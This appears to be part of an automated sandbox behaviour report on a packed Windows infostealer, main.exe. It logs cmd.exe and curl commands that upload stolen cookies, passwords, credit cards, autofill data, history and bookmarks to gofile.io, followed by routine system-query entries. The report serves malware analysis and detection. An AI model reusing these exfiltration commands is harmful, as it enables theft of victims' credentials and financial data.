Source: C:\Users\user\Desktop\main.exe	Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "curl -f "file=@c:\users\user\appdata\local\tempprysmax-745773\prcookies.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfile"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl -f "file=@c:\users\user\appdata\local\tempprysmax-745773\prcookies.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfile
Source: C:\Users\user\Desktop\main.exe	Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "curl -f "file=@c:\users\user\appdata\local\tempprysmax-745773\prcreditcards.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfile"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl -f "file=@c:\users\user\appdata\local\tempprysmax-745773\prcreditcards.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfile
Source: C:\Users\user\Desktop\main.exe	Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "curl -f "file=@c:\users\user\appdata\local\tempprysmax-745773\prautofills.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfile"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl -f "file=@c:\users\user\appdata\local\tempprysmax-745773\prautofills.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfile
Source: C:\Users\user\Desktop\main.exe	Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "curl -f "file=@c:\users\user\appdata\local\tempprysmax-745773\prhistories.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfile"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl -f "file=@c:\users\user\appdata\local\tempprysmax-745773\prhistories.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfile
Source: C:\Users\user\Desktop\main.exe	Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "curl -f "file=@c:\users\user\appdata\local\tempprysmax-745773\prbookmarks.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfile"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl -f "file=@c:\users\user\appdata\local\tempprysmax-745773\prbookmarks.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfile
Source: C:\Users\user\Desktop\main.exe	Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "curl -f "file=@c:\users\user\appdata\local\tempprysmax-745773\prpasswords.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfile"	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "curl -f "file=@c:\users\user\appdata\local\tempprysmax-745773\prcookies.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfile"	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "curl -f "file=@c:\users\user\appdata\local\tempprysmax-745773\prcreditcards.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfile"	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "curl -f "file=@c:\users\user\appdata\local\tempprysmax-745773\prautofills.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfile"	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "curl -f "file=@c:\users\user\appdata\local\tempprysmax-745773\prhistories.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfile"	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "curl -f "file=@c:\users\user\appdata\local\tempprysmax-745773\prbookmarks.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfile"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl -f "file=@c:\users\user\appdata\local\tempprysmax-745773\prpasswords.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfile	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl -f "file=@c:\users\user\appdata\local\tempprysmax-745773\prcookies.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfile	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl -f "file=@c:\users\user\appdata\local\tempprysmax-745773\prcreditcards.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfile	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl -f "file=@c:\users\user\appdata\local\tempprysmax-745773\prautofills.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfile	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl -f "file=@c:\users\user\appdata\local\tempprysmax-745773\prhistories.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfile	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl -f "file=@c:\users\user\appdata\local\tempprysmax-745773\prbookmarks.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfile	Jump to behavior

Contains functionality to query CPU information (cpuid)

Source: C:\Users\user\Desktop\main.exe

Code function: 0_2_00007FF7333BA7E0 cpuid

0_2_00007FF7333BA7E0

Queries the volume information (name, serial number etc) of a device

Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Cipher VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Cipher VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Cipher VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Cipher VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Cipher VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Hash VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Hash VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\PublicKey VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Util VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\MarkupSafe-3.0.2.dist-info VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\MarkupSafe-3.0.2.dist-info VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\MarkupSafe-3.0.2.dist-info VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\MarkupSafe-3.0.2.dist-info VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\PIL VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\PIL VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\PIL VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\PIL VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\cryptography-44.0.0.dist-info VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\cryptography-44.0.0.dist-info VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\cryptography-44.0.0.dist-info VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\cryptography-44.0.0.dist-info VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\cryptography-44.0.0.dist-info VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\cryptography-44.0.0.dist-info\licenses VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\cryptography-44.0.0.dist-info VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\cryptography-44.0.0.dist-info\licenses VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\h2-4.1.0.dist-info VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\h2-4.1.0.dist-info VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\h2-4.1.0.dist-info VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\h2-4.1.0.dist-info VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\h2-4.1.0.dist-info VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\ossl-modules VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\pywin32_system32 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\setuptools-65.5.0.dist-info VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\setuptools-65.5.0.dist-info VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\setuptools-65.5.0.dist-info VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\win32 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\win32 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\zstandard VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\_bz2.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\_lzma.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\win32 VolumeInformation	Jump to behavior
